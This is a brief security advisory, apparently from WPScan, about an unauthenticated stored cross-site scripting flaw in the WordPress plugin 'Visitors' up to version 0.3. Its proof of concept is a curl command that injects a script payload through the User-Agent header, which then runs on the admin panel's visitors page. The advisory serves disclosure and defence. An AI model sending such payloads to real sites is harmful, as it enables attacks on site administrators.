Visitors <= 0.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

Description
The plugin is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. The plugin would display the user's user agent string without validation or encoding within the WordPress admin panel.

Proof of Concept

$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>"

The payload will be executed on the "visitors" page within the WordPress admin panel. 

References

https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc